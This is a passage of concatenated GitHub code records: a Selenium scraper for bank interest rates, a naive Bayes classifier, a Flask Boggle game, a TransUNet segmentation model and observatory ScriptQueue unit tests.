jsonify(result)\n\n\nif __name__ == '__main__':\n app.run(port='5002')\n","repo_name":"ztang3/22_582_tang","sub_path":"database_endpoint.py","file_name":"database_endpoint.py","file_ext":"py","file_size_in_byte":4023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"6918870031","text":"n = int(input())\n\narray = []\nzero = 0\nminus = []\nfor _ in range(n):\n number = int(input())\n if number > 0:\n array.append(number)\n elif number == 0:\n zero += 1\n else:\n minus.append(-number)\n\narray.sort(reverse=True)\nminus.sort(reverse=True)\n\ntotal = 0\ntmp = None\nfor i in range(len(array)):\n if tmp is None:\n tmp = array[i]\n if i == len(array) - 1:\n total += tmp\n else:\n if array[i] > 1:\n total += tmp * array[i]\n else:\n total += tmp + array[i]\n tmp = None\n array[i] = 0\n\ntmp = None\nfor i in range(len(minus)):\n if tmp is None:\n tmp = minus[i]\n if i == len(minus) - 1 and zero == 0:\n total -= tmp\n else:\n total += tmp * minus[i]\n tmp = None\n minus[i] = 0\n\nprint(total)\n","repo_name":"rt3310/TIL","sub_path":"algorithm/baekjoon/1744_수 묶기.py","file_name":"1744_수 묶기.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"27640929865","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import Select\nimport time\nfrom bs4 import BeautifulSoup\nimport json\n\ndef obtenerRetasas(departamento, tipoProducto, producto, condicion):\n\n # Acceso a la página de retasas\n driver = webdriver.Firefox()\n driver.get(\"http://www.sbs.gob.pe/app/retasas/paginas/retasasinicio.aspx\")\n\n # Llenado del formulario, dando tiempo a que se refresquen los items\n select = Select(driver.find_element_by_name('ddlDepartamento'))\n select.select_by_value(departamento)\n time.sleep(1) \n select = Select(driver.find_element_by_name('ddlTipoProducto'))\n select.select_by_value(tipoProducto)\n time.sleep(1) \n select = Select(driver.find_element_by_name('ddlProducto'))\n select.select_by_value(producto)\n time.sleep(1) \n select = Select(driver.find_element_by_name('ddlCondicion'))\n select.select_by_value(condicion) \n\n # Se acciona el botón \"Consultar\"\n driver.find_element_by_id(\"btnConsultar\").click()\n time.sleep(1) \n\n # Se apunta al iframe generado con la tabla de retasas\n driver.switch_to.frame(\"ifrmContendedor\")\n\n # Se obtiene el contenido del iframe\n soup=BeautifulSoup(driver.page_source, 'html.parser')\n\n # Se cierra el driver de Selenium\n driver.close()\n\n # Se obtiene la tabla con las retasas\n one_a_tag = soup.find(\"table\", {\"id\": \"myTable\"})\n\n table_body = one_a_tag.find_all('tr')\n\n # Se pasa la información a una lista\n table_headers = [[cell.text for cell in row(\"th\")]\n for row in table_body]\n\n table_data = [[cell.text for cell in row(\"td\")]\n for row in table_body]\n\n # Se retira el encabezado vacío\n del table_data[0]\n\n resultado = []\n\n # Se convierte la lista de item a una lista de diccionarios\n for fila in table_data:\n item = {\n table_headers[0][0]: fila[0],\n table_headers[0][1]: fila[1],\n table_headers[0][2]: fila[2]\n }\n resultado.append(item)\n\n # Se retorna el json con los datos de retasas\n return json.dumps(resultado, separators=(',', ':'))\n\n","repo_name":"jogacolhue/RETASASscrapper","sub_path":"retasas.py","file_name":"retasas.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"15242480379","text":"#####################\n# classify.py\n# shaurya kethireddy\n#####################\nimport os\nimport math\n\n\ndef create_bow(vocab, filepath):\n \"\"\" Create a single dictionary for the data\n Note: label may be None\n \"\"\"\n bow = {None: 0}\n for var in vocab:\n bow[var] = 0\n\n file = open(filepath, \"r\")\n for line in file:\n holder = line.rstrip()\n if holder in bow:\n bow[holder] += 1\n else:\n bow[None] += 1\n\n if bow[None] == 0:\n del bow[None]\n for obj in vocab:\n if bow[obj] == 0:\n del bow[obj]\n return bow\n\n\ndef create_vocabulary(directory, cutoff):\n \"\"\" Create a vocabulary from the training directory\n return a sorted vocabulary list\n \"\"\"\n top_level = os.listdir(directory)\n vocab = {}\n for d in top_level:\n subdir = d if d[-1] == '/' else d+'/'\n files = os.listdir(directory+subdir)\n for f in files:\n with open(directory+subdir+f, 'r') as doc:\n for word in doc:\n word = word.strip()\n if not word in vocab and len(word) > 0:\n vocab[word] = 1\n elif len(word) > 0:\n vocab[word] += 1\n return sorted([word for word in vocab if vocab[word] >= cutoff])\n\n\ndef load_training_data(vocab, directory):\n \"\"\" Create the list of dictionaries \"\"\"\n top_level = os.listdir(directory)\n dataset = []\n for d in top_level:\n if d[-1] == '/':\n label = d[:-1]\n subdir = d\n else:\n label = d\n subdir = d+\"/\"\n files = os.listdir(directory+subdir)\n for f in files:\n bow = create_bow(vocab, directory+subdir+f)\n dataset.append({'label': label, 'bow': bow})\n return dataset\n\n\ndef prior(training_data, label_list):\n \"\"\" return the prior probability of the label in the training set\n => frequency of DOCUMENTS\n \"\"\"\n\n smooth = 1 # smoothing factor\n logprob = {}\n total = len(training_data)\n for label in label_list:\n ctr = 0\n for data in training_data:\n if data['label'] == label:\n ctr += 1\n # log probability of certain label\n logprob[label] = math.log((ctr + smooth) / float(total + len(label_list)))\n\n return logprob\n\n\ndef p_word_given_label(vocab, training_data, label):\n \"\"\" return the class conditional probability of label over all words, with smoothing \"\"\"\n smooth = 1 # smoothing factor\n word_prob = {}\n dict = {None: 0}\n for it in vocab:\n dict[it] = 0\n ctr = 0\n for data in training_data:\n for word in data['bow']:\n if data['label'] == label:\n ctr += data['bow'][word]\n for data in training_data:\n if data['label'] == label:\n for word in data['bow']: # Go through each valid bow\n if word in vocab: # Word is either in vocab or part of None\n dict[word] += data['bow'][word]\n else:\n dict[None] += data['bow'][word]\n\n for x in dict:\n word_prob[x] = math.log((dict[x] + smooth) / float(ctr + smooth * (len(vocab) + 1)))\n\n return word_prob\n\n\ndef train(training_directory, cutoff):\n \"\"\" return a dictionary formatted as follows:\n {\n 'vocabulary': ,\n 'log prior': ,\n 'log p(w|y=2016)': ,\n 'log p(w|y=2020)': \n }\n \"\"\"\n retval = {}\n label_list = os.listdir(training_directory)\n vocab = create_vocabulary(training_directory, cutoff)\n data = load_training_data(vocab, training_directory)\n retval['vocabulary'] = vocab\n retval['log prior'] = prior(data, label_list)\n retval['log p(w|y=2016)'] = p_word_given_label(vocab, data, '2016')\n retval['log p(w|y=2020)'] = p_word_given_label(vocab, data, '2020')\n # print(retval)\n return retval\n\n\ndef classify(model, filepath):\n \"\"\" return a dictionary formatted as follows:\n {\n 'predicted y': <'2016' or '2020'>,\n 'log p(y=2016|x)': ,\n 'log p(y=2020|x)': \n }\n \"\"\"\n retval = {}\n sixteen = 0\n twenty = 0\n file = open(filepath, \"r\")\n for line in file:\n holder = line.rstrip()\n if holder in model['vocabulary']:\n sixteen += model['log p(w|y=2016)'][holder]\n twenty += model['log p(w|y=2020)'][holder]\n else:\n sixteen += model['log p(w|y=2016)'][None]\n twenty += model['log p(w|y=2020)'][None]\n prob20 = model['log prior']['2020'] + twenty\n prob16 = model['log prior']['2016'] + sixteen\n retval['log p(y=2020|x)'] = prob20\n retval['log p(y=2016|x)'] = prob16\n if prob20 > prob16:\n retval['predicted y'] = '2020'\n else:\n retval['predicted y'] = '2016'\n return retval\n\n\n# train('./corpus/test/', 2)\n# vocab = create_vocabulary('./corpus/training/', 2)\n# training_data = load_training_data(vocab,'./corpus/training/')\n# print(prior(training_data, ['2020', '2016']))\n\n# model = train('./corpus/training/', 2)\n# classify(model, './corpus/test/2016/0.txt')\n\n\n","repo_name":"shaurya-k/classify","sub_path":"classify.py","file_name":"classify.py","file_ext":"py","file_size_in_byte":5411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"16076095402","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\n# @File : BasicMLPs.py\r\n# @Date : 2020-09-16\r\n# @Author : mingjian\r\n 描述\r\n\"\"\"\r\n\r\nimport torch.nn as nn\r\n\r\nclass BasicNets(nn.Module):\r\n def __init__(self,net_params):\r\n super().__init__()\r\n self.node_in_dim = net_params['node_in_dim']\r\n self.device = net_params['device']\r\n self.dropout = net_params['dropout']\r\n self.n_layers = net_params['L']\r\n self.h_dim = net_params['h_dim']\r\n self.in_feat_dropout = nn.Dropout(net_params['in_feat_dropout'])\r\n\r\n def loss(self, scores, targets):\r\n # loss = nn.MSELoss()(scores,targets)\r\n loss = nn.L1Loss()(scores, targets)\r\n return loss","repo_name":"netlearningteam/SPN-Benchmark-DS","sub_path":"GNNs/nets/BasicMLPs.py","file_name":"BasicMLPs.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"70268199561","text":"\"\"\" Script que calcula a área do círculo\n Exemplo de função comentada\n Python for ABM - Ipea - Março 2019\n \"\"\"\n\nimport math\n\n\ndef area_circle(r):\n \"\"\" Função que calcula área do círculo.\n Parâmetro: r - o raio do círculo\n Retorna a área\n \"\"\"\n\n # Fórmula área\n area = math.pi * r ** 2\n return area\n\n\n\"\"\" Running the module individually.\n Quando importado, o código abaixo não roda\n \"\"\"\nif __name__ == '__main__':\n raio = 2\n result = area_circle(raio)\n # Exemplo de formatação de output com float e duas casas decimais usando format\n print('A área é: {:.2f}'.format(result))\n","repo_name":"BAFurtado/Python4ABMIpea2019","sub_path":"function5_comentada.py","file_name":"function5_comentada.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"13601158123","text":"from flask import Flask, render_template, redirect, session, request, jsonify\nfrom flask_debugtoolbar import DebugToolbarExtension\nfrom boggle import Boggle\n\nboggle_game = Boggle()\n\napp = Flask(__name__)\n\napp.config['SECRET_KEY'] = \"do*not*tell\"\napp.config['DEBUG_TB_INTERCEPT_REDIRECTS'] = False\n\ndebug = DebugToolbarExtension(app)\n\n@app.route('/')\ndef render_index():\n return render_template('welcome.html')\n\ndef check_for_board():\n \"\"\" Check session storage to see if there is a currently valid board.\n If not, initialize session storage. \"\"\"\n if not session.get('board'):\n boggle_game = Boggle()\n session['board'] = boggle_game.make_board()\n session['games_played'] = 0\n session['high_score'] = 0\n\n@app.route('/play')\ndef render_gameboard():\n \"\"\" Looks for a current game, makes a new one if needed, and then renders the gameplay template. \"\"\"\n check_for_board()\n return render_template('gameplay.html', board = session['board'], games_played = session['games_played'], high_score = session['high_score'])\n\n@app.route('/make-guess')\ndef return_guess():\n \"\"\" Checks word submission for validity.\"\"\"\n response = boggle_game.check_valid_word(session['board'], request.args['guess'])\n return jsonify(response)\n\n@app.route('/end-game', methods=['POST'])\ndef get_endgame_score():\n \"\"\" Updates session data and redirects to start a new game. \"\"\"\n session['games_played'] += 1\n new_score = int(request.form.get('score'))\n high_score = int(session['high_score'])\n if new_score > high_score:\n session['high_score'] = new_score\n return redirect('/new-game')\n\n@app.route('/new-game')\ndef show_endgame():\n \"\"\" Sets up a new game with a new board. \"\"\"\n boggle_game.set_up_game()\n session['board'] = boggle_game.make_board()\n return render_template('gameplay.html', board = session['board'], games_played = session['games_played'], high_score = session['high_score'])","repo_name":"reverie121/flask-boggle","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"41650834534","text":"\"\"\" Full assembly of the parts to form the complete network \"\"\"\nimport os, sys\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n# import ../db.py\nfrom tag.tag import Stage\nfrom .unet_parts import *\nfrom torch import nn\nimport torch\nfrom .res_net import resnet34, resnet18, resnet50, resnet101, resnet152, BasicBlock, Bottleneck, ResNet\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom einops import rearrange, repeat\nfrom einops.layers.torch import Rearrange\nimport math\n\n\nclass SaveFeatures():\n features = None\n\n # def __init__(self, m): self.hook = m.register_forward_hook(self.hook_fn)\n\n # def hook_fn(self, module, input, output): self.features = output\n\n # def remove(self): self.hook.remove()\n\n def __init__(self,m):\n self._outputs_lists = {}\n self.mymodule = m\n m.register_forward_hook(hook=self.save_output_hook)\n\n def save_output_hook(self, _, input, output):\n self._outputs_lists[input[0].device.index] = output\n self.features = self._outputs_lists\n\n def forward(self, x) -> list:\n self._outputs_lists[x.device.index] = []\n self.mymodule(x)\n return self._outputs_lists[x.device.index]\n\n\nclass UnetStageBlock(nn.Module):\n def __init__(self, stage, up_in, x_in, n_out, ratio):\n super().__init__()\n # super(UnetBlock, self).__init__()\n up_out = x_out = n_out // 2\n self.x_conv = nn.Conv2d(x_in, x_out, 1)\n self.g_fc = nn.Linear(7,x_out * 2)\n self.tr_conv = nn.ConvTranspose2d(up_in, up_out, 2, stride=2)\n self.stage = stage\n\n self.bn = nn.BatchNorm2d(n_out)\n\n self.pointwise = nn.Conv2d(14, n_out, kernel_size=1)\n self.depthwise = nn.Conv2d(n_out, n_out, kernel_size=3, stride=ratio , padding=1, groups=up_out) \n\n def forward(self, up_p, x_p, give):\n up_p = self.tr_conv(up_p)\n x_p = self.x_conv(x_p)\n cat_p = torch.cat([up_p, x_p], dim=1)\n res = self.bn(F.relu(cat_p))\n # g_p = self.g_fc(give).unsqueeze(-1).unsqueeze(-1) * res\n g_p = self.depthwise(self.pointwise(give))\n res = self.stage(g_p,res)\n return res\n\nclass UnetBlock(nn.Module):\n def __init__(self, up_in, x_in, n_out):\n super().__init__()\n # super(UnetBlock, self).__init__()\n up_out = x_out = n_out // 2\n self.x_conv = nn.Conv2d(x_in, x_out, 1)\n self.tr_conv = nn.ConvTranspose2d(up_in, up_out, 2, stride=2)\n\n self.bn = nn.BatchNorm2d(n_out)\n\n def forward(self, up_p, x_p):\n up_p = self.tr_conv(up_p)\n x_p = self.x_conv(x_p)\n cat_p = torch.cat([up_p, x_p], dim=1)\n res = self.bn(F.relu(cat_p))\n return res\n\nclass TransUNet(nn.Module):\n\n def __init__(self, args, resnet='resnet34', num_classes=2, pretrained=False,\n in_chans=3,\n inplanes=64,\n num_layers=(3, 4, 6, 3),\n num_chs=(256, 512, 1024, 2048),\n num_strides=(1, 2, 2, 2),\n num_heads=(1, 2, 4, 8),\n num_parts=(1, 1, 1, 1),\n patch_sizes=(7, 7, 7, 8),\n drop_path=0.1,\n num_enc_heads=(1, 1, 1, 1),\n act=nn.GELU,\n ffn_exp=3,\n has_last_encoder=False\n ):\n super().__init__()\n # super(ResUnet, self).__init__()\n\n ''' ~~~~~ For the embedding transformer~~~~~'''\n cut, lr_cut = [8, 6]\n\n dim = args.dim #dim of transformer sequence, D of E\n\n self.mlp_head = nn.Sequential(\n nn.LayerNorm(dim),\n nn.Linear(dim, dim)\n )\n '''~~~~~~End of embedding transformer~~~~~'''\n\n 'unet and goinnet parameters'\n if resnet == 'resnet34':\n base_model = resnet34\n elif resnet == 'resnet18':\n base_model = resnet18\n elif resnet == 'resnet50':\n base_model = resnet50\n elif resnet == 'resnet101':\n base_model = resnet101\n elif resnet == 'resnet152':\n base_model = resnet152\n else:\n raise Exception('The Resnet Model only accept resnet18, resnet34, resnet50,'\n 'resnet101 and resnet152')\n \n '''define the stage for goinnet giving'''\n last_chs = (256,256,256,256)\n num_chs = (256, 256, 256, 256)\n down_samples = (2,4,8,16)\n n_l = 1\n stage_list = []\n for i in range(4):\n stage_list.append(\n Stage(last_chs[i],\n num_chs[i],\n n_l,\n num_heads=num_heads[i], #1,2,4,8\n num_parts = (patch_sizes[i]**2 * (args.image_size // down_samples[i] // patch_sizes[i])**2),\n patch_size=patch_sizes[i], #8,8,8,8\n drop_path=drop_path, #0.05\n ffn_exp=ffn_exp, #mlp hidden fea\n last_enc=has_last_encoder and i == len(num_layers) - 1)\n )\n self.stages = nn.ModuleList(stage_list) \n '''end'''\n\n layers = list(base_model(pretrained=pretrained).children())[:cut]\n self.check_layer = layers\n base_layers = nn.Sequential(*layers)\n self.rn = base_layers\n\n\n self.num_classes = num_classes\n self.sfs = [SaveFeatures(base_layers[i]) for i in [2, 4, 5, 6]]\n self.up1 = UnetStageBlock(self.stages[3], 512, 256, 256,16)\n self.up2 = UnetStageBlock(self.stages[2], 256, 128, 256,8)\n self.up3 = UnetStageBlock(self.stages[1], 256, 64, 256,4)\n self.up4 = UnetStageBlock(self.stages[0], 256, 64, 256,2)\n\n self.up5 = nn.ConvTranspose2d(256, self.num_classes, 2, stride=2)\n self.munet = MUNet(args)\n\n if args.sim_gpu:\n self.sim_gpu = args.sim_gpu\n self.gpu_device = args.gpu_device\n else:\n self.munet = MUNet(args)\n self.sim_gpu = 0\n '''~~~ self definition ~~~'''\n self.fc = nn.Linear(7,dim)\n self.tr_conv = nn.ConvTranspose2d(512, 512, 2, stride=2)\n\n def forward(self, x, cond, mod = 'train'):\n aux = {}\n mergf = []\n img = x\n # x = torch.cat((x,heatmap),1)\n x = F.relu(self.rn(x)) # x = [b_size, 2048, 8, 8]\n emb = x\n\n if mod == 'shuffle':\n self.up1.eval()\n self.up2.eval()\n self.up3.eval()\n self.up4.eval()\n self.up5.eval()\n\n '''~~~ 0: agg ~~~'''\n x = self.up1(x, self.sfs[3].features[x.device.index], cond)\n mergf.append(x)\n x = self.up2(x, self.sfs[2].features[x.device.index], cond)\n mergf.append(x)\n x = self.up3(x, self.sfs[1].features[x.device.index], cond)\n mergf.append(x)\n x = self.up4(x, self.sfs[0].features[x.device.index], cond)\n fea = x\n output = self.up5(x)\n '''end'''\n\n if mod == 'shuffle':\n aux['mergfs'] = mergf\n return output, aux\n\n if self.sim_gpu:\n self.munet = self.munet.to('cuda:' + str(self.sim_gpu))\n ave, mapsin = self.munet(img.to('cuda:' + str(self.sim_gpu)), output.detach().to('cuda:' + str(self.sim_gpu)))\n ave = ave.to('cuda:' + str(self.gpu_device))\n mapsin = mapsin.to('cuda:' + str(self.gpu_device))\n maps = [mapsin[:,i,:,:] for i in range(7)]\n else:\n ave, mapsin = self.munet(img, output.detach())\n maps = [mapsin[:,i,:,:] for i in range(7)]\n\n '''~~~ 0: ENDs ~~~'''\n\n pred_stack = torch.stack(maps) #7,b,c,w,w\n pred_stack_t = F.sigmoid(pred_stack)\n\n self_pred = pred_stack_t * torch.div(pred_stack_t, torch.sum(pred_stack_t, dim = 0, keepdim=True)) #7,b,c,w,w\n self_pred = rearrange(self_pred, \"a b c h w -> b (a c) h w\").contiguous() #b,7c,w,w\n cond = self_pred\n # maps = [nn.Upsample(scale_factor=2, mode='bilinear')(a) for a in maps]\n aux['maps'] = maps\n aux['cond'] = cond\n aux['mergfs'] = mergf\n aux['emb'] = emb\n return output, aux\n\n\n def close(self):\n for sf in self.sfs: sf.remove()\n\nclass MUNet(nn.Module):\n\n def __init__(self, args, resnet='resnet34', num_classes=2, pretrained=False):\n super().__init__()\n # super(ResUnet, self).__init__()\n drop_path=0.05\n patch_sizes = (8,8,8,8)\n num_heads = (4,4,4,7)\n last_chs = (5,16,16,16)\n num_chs = (16, 16, 16, 14)\n down_samples = (4,4,4,4)\n n_l = 1\n stage_list = []\n for i in range(4):\n stage_list.append(\n Stage(last_chs[i],\n num_chs[i],\n n_l,\n num_heads=num_heads[i], \n num_parts = (patch_sizes[i]**2 * (args.image_size // down_samples[i] // patch_sizes[i])**2),\n patch_size=patch_sizes[i], \n drop_path=drop_path, \n ffn_exp=0.5, \n last_enc=0)\n )\n self.stages = nn.ModuleList(stage_list)\n self.downsample = nn.AvgPool2d(kernel_size=3, stride=4, padding=1)\n self.upsample = nn.Upsample(scale_factor=4, mode='bilinear')\n self.args = args\n\n def forward(self, x, heatmap):\n outlist = []\n x = torch.cat((x,heatmap),1)\n x = self.downsample(x)\n x = self.stages[0](x,x)\n # x = self.downsample(x)\n x = x.to('cuda:' + str(self.args.sim_gpu+2))\n stage1 = self.stages[1].to('cuda:' + str(self.args.sim_gpu+2))\n stage2 = self.stages[1].to('cuda:' + str(self.args.sim_gpu+2))\n x = stage1(x,x)\n x = stage2(x,x)\n x = x.to('cuda:' + str(self.args.gpu_device))\n # x = self.stages[1](x,x)\n # x = self.stages[2](x,x)\n # x = self.upsample(x)\n if self.args.sim_gpu:\n x = x.to('cuda:' + str(self.args.sim_gpu+1))\n last_stage = self.stages[3].to('cuda:' + str(self.args.sim_gpu+1))\n x = last_stage(x,x)\n x = x.to('cuda:' + str(self.args.gpu_device))\n # x = self.stages[3](x,x)\n x = self.upsample(x)\n x = rearrange(x, \"b (g c) h w -> b g c h w\", g = 7)\n outlist = [x[:,i,:,:] for i in range(7)]\n # outlist.append(x.item()[:,i,:,:] for i in range(7))\n\n\n return sum(outlist)/ 7, x\n\n def close(self):\n for sf in self.sfs: sf.remove()\n\nclass UNet(nn.Module):\n\n def __init__(self, args, resnet='resnet34', num_classes=2, pretrained=False):\n super().__init__()\n # super(ResUnet, self).__init__()\n\n ''' ~~~~~ For the embedding transformer~~~~~'''\n cut, lr_cut = [8, 6]\n\n 'unet and goinnet parameters'\n if resnet == 'resnet34':\n base_model = resnet34\n elif resnet == 'resnet18':\n base_model = resnet18\n elif resnet == 'resnet50':\n base_model = resnet50\n elif resnet == 'resnet101':\n base_model = resnet101\n elif resnet == 'resnet152':\n base_model = resnet152\n else:\n raise Exception('The Resnet Model only accept resnet18, resnet34, resnet50,'\n 'resnet101 and resnet152')\n\n layers = list(base_model(pretrained=pretrained,inplanes = 3).children())[:cut]\n self.check_layer = layers\n base_layers = nn.Sequential(*layers)\n self.rn = base_layers\n\n\n self.num_classes = num_classes\n self.sfs = [SaveFeatures(base_layers[i]) for i in [2, 4, 5, 6]]\n self.up1 = UnetBlock(512, 256, 256)\n self.up2 = UnetBlock(256, 128, 256)\n self.up3 = UnetBlock(256, 64, 256)\n self.up4 = UnetBlock(256, 64, 256)\n\n self.up5 = nn.ConvTranspose2d(256, self.num_classes, 2, stride=2)\n\n self.pred1 = nn.ConvTranspose2d(256, self.num_classes, 2, stride=2)\n self.pred2 = nn.ConvTranspose2d(256, self.num_classes, 2, stride=2)\n self.pred3 = nn.ConvTranspose2d(256, self.num_classes, 2, stride=2)\n self.pred4 = nn.ConvTranspose2d(256, self.num_classes, 2, stride=2)\n self.pred5 = nn.ConvTranspose2d(256, self.num_classes, 2, stride=2)\n self.pred6 = nn.ConvTranspose2d(256, self.num_classes, 2, stride=2)\n self.pred7 = nn.ConvTranspose2d(256, self.num_classes, 2, stride=2)\n\n def forward(self, x):\n x = F.relu(self.rn(x)) # x = [b_size, 2048, 8, 8]\n\n\n '''~~~ 0: Decoder ~~~'''\n x = self.up1(x, self.sfs[3].features[x.device.index])\n x = self.up2(x, self.sfs[2].features[x.device.index])\n x = self.up3(x, self.sfs[1].features[x.device.index])\n x = self.up4(x, self.sfs[0].features[x.device.index])\n fea = x\n output = self.up5(x)\n '''~~~ 0: ENDs ~~~'''\n '''\n if self.num_classes==1:\n output = x_out[:, 0]\n else:\n output = x_out[:, :self.num_classes]\n '''\n return output\n\n def close(self):\n for sf in self.sfs: sf.remove()\n\n\n","repo_name":"WuJunde/MrPrism","sub_path":"models/unet/unet_model.py","file_name":"unet_model.py","file_ext":"py","file_size_in_byte":13090,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"63"} +{"seq_id":"11378317055","text":"import asyncio\nimport logging\nimport types\nimport typing\nimport unittest\nimport unittest.mock\n\nimport yaml\nfrom lsst.ts import idl, salobj\nfrom lsst.ts.observatory.control import Usages\nfrom lsst.ts.observatory.control.mock import RemoteGroupAsyncMock\nfrom lsst.ts.observatory.control.script_queue import ScriptQueue\n\nHB_TIMEOUT = 5 # Heartbeat timeout (sec)\nMAKE_TIMEOUT = 60 # Timeout for make_script (sec)\n\n\nclass TestScriptQueue(RemoteGroupAsyncMock):\n log: logging.Logger\n script_queue: ScriptQueue\n components_metadata: typing.Dict[str, salobj.IdlMetadata]\n\n @classmethod\n def setUpClass(cls) -> None:\n \"\"\"This classmethod is only called once, when preparing the unit\n test.\n \"\"\"\n\n cls.log = logging.getLogger(__name__)\n\n cls.script_queue = ScriptQueue(\n queue_index=idl.enums.ScriptQueue.SalIndex.MAIN_TEL,\n domain=\"FakeDomain\",\n log=cls.log,\n intended_usage=Usages.DryTest,\n )\n\n # Gather metadada information, needed to validate topics versions\n cls.components_metadata = cls.get_component_metadata(\n cls.script_queue.components\n )\n\n return super().setUpClass()\n\n @property\n def remote_group(self) -> ScriptQueue:\n return self.script_queue\n\n async def setup_types(self) -> None:\n self.available_scripts = types.SimpleNamespace(\n **self.components_metadata[\"ScriptQueue:1\"]\n .topic_info[\"logevent_availableScripts\"]\n .field_info\n )\n self.standard_scripts = [\n \"std_script1,std_script2\",\n \"auxtel/std_script1\",\n \"maintel/std_script1\",\n ]\n self.external_scripts = [\n \"ext_script1,ext_script2\",\n \"auxtel/ext_script1\",\n \"maintel/ext_script1\",\n ]\n\n self.available_scripts.standard = ScriptQueue.script_separator.join(\n self.standard_scripts\n )\n self.available_scripts.external = ScriptQueue.script_separator.join(\n self.external_scripts\n )\n\n self.config_schema = types.SimpleNamespace(\n **self.components_metadata[\"ScriptQueue:1\"]\n .topic_info[\"logevent_configSchema\"]\n .field_info\n )\n self.config_schema.isStandard = True\n self.config_schema.path = \"std_script1\"\n\n self.config_schema.configSchema = \"\"\"\n$schema: http://json-schema.org/draft-07/schema#\n$id: https://github.com/lsst-ts/ts_standardscripts/base_slew.yaml\ntitle: BaseTrackTarget v1\ndescription: Configuration for BaseTrackTarget.\ntype: object\nproperties:\n ra:\n description: ICRS right ascension (hour).\n type: number\n minimum: 0\n maximum: 24\n dec:\n description: ICRS declination (deg).\n type: number\n minimum: -90\n maximum: 90\n name:\n description: Target name\n type: string\nrequired:\n - ra\n - dec\n - name\nadditionalProperties: false\n \"\"\"\n\n self.logevent_queue = types.SimpleNamespace(\n **self.components_metadata[\"ScriptQueue:1\"]\n .topic_info[\"logevent_queue\"]\n .field_info\n )\n self.logevent_queue.enabled = True\n self.logevent_queue.running = True\n\n async def setup_mocks(self) -> None:\n self.script_queue.rem.scriptqueue_1.evt_availableScripts.attach_mock(\n unittest.mock.Mock(),\n \"flush\",\n )\n self.script_queue.rem.scriptqueue_1.evt_configSchema.attach_mock(\n unittest.mock.Mock(),\n \"flush\",\n )\n self.script_queue.rem.scriptqueue_1.evt_queue.attach_mock(\n unittest.mock.Mock(),\n \"flush\",\n )\n\n self.script_queue.rem.scriptqueue_1.configure_mock(\n **{\n \"evt_availableScripts.next.return_value\": self.available_scripts,\n \"evt_configSchema.next.return_value\": self.config_schema,\n \"cmd_pause.start.side_effect\": self.script_queue_cmd_pause,\n \"cmd_pause.set_start.side_effect\": self.script_queue_cmd_pause,\n \"cmd_resume.start.side_effect\": self.script_queue_cmd_resume,\n \"cmd_resume.set_start.side_effect\": self.script_queue_cmd_resume,\n \"evt_queue.next.side_effect\": self.get_logevent_queue,\n \"evt_queue.aget.side_effect\": self.get_logevent_queue,\n }\n )\n\n async def test_list_standard_scripts(self) -> None:\n standard_scripts = await self.script_queue.list_standard_scripts()\n\n self.script_queue.rem.scriptqueue_1.evt_availableScripts.flush.assert_called_once()\n self.script_queue.rem.scriptqueue_1.evt_availableScripts.next.assert_awaited_with(\n flush=False,\n timeout=self.script_queue.fast_timeout,\n )\n self.script_queue.rem.scriptqueue_1.cmd_showAvailableScripts.start.assert_awaited_with(\n timeout=self.script_queue.fast_timeout,\n )\n assert standard_scripts == self.standard_scripts\n\n async def test_list_external_scripts(self) -> None:\n external_scripts = await self.script_queue.list_external_scripts()\n\n self.script_queue.rem.scriptqueue_1.evt_availableScripts.flush.assert_called_once()\n self.script_queue.rem.scriptqueue_1.evt_availableScripts.next.assert_awaited_with(\n flush=False,\n timeout=self.script_queue.fast_timeout,\n )\n self.script_queue.rem.scriptqueue_1.cmd_showAvailableScripts.start.assert_awaited_with(\n timeout=self.script_queue.fast_timeout,\n )\n\n assert external_scripts == self.external_scripts\n\n async def test_get_script_schema(self) -> None:\n schema = await self.script_queue.get_script_schema(\n is_standard=True,\n script=\"std_script1\",\n )\n\n self.assert_get_script_schema_calls()\n assert schema == self.config_schema.configSchema\n\n async def test_validate_config_good(self) -> None:\n config = dict(ra=10, dec=-30, name=\"target\")\n\n await self.script_queue.validate_config(\n is_standard=True,\n script=\"std_script1\",\n config=config,\n )\n\n self.assert_get_script_schema_calls()\n\n async def test_validate_config_err(self) -> None:\n config = dict(ra=10, dec=-30)\n\n with self.assertRaisesRegex(\n RuntimeError, expected_regex=\"'name' is a required property\"\n ):\n await self.script_queue.validate_config(\n is_standard=True,\n script=\"std_script1\",\n config=config,\n )\n\n self.assert_get_script_schema_calls()\n\n async def test_add(self) -> None:\n is_standard = True\n script = \"std_script1\"\n config = dict(ra=10, dec=-30, name=\"target\")\n\n await self.script_queue.add(\n is_standard=is_standard,\n script=script,\n config=config,\n )\n\n self.assert_add(\n is_standard=is_standard,\n script=script,\n config=config,\n )\n\n async def test_add_standard(self) -> None:\n script = \"std_script1\"\n config = dict(ra=10, dec=-30, name=\"target\")\n\n await self.script_queue.add_standard(\n script=script,\n config=config,\n )\n\n self.assert_add(\n is_standard=True,\n script=script,\n config=config,\n )\n\n async def test_add_external(self) -> None:\n script = \"ext_script1\"\n config = dict(ra=10, dec=-30, name=\"target\")\n\n await self.script_queue.add_external(\n script=script,\n config=config,\n )\n\n self.assert_add(\n is_standard=False,\n script=script,\n config=config,\n )\n\n async def test_get_queue(self) -> None:\n queue = await self.script_queue.get_queue()\n\n assert queue == self.logevent_queue\n 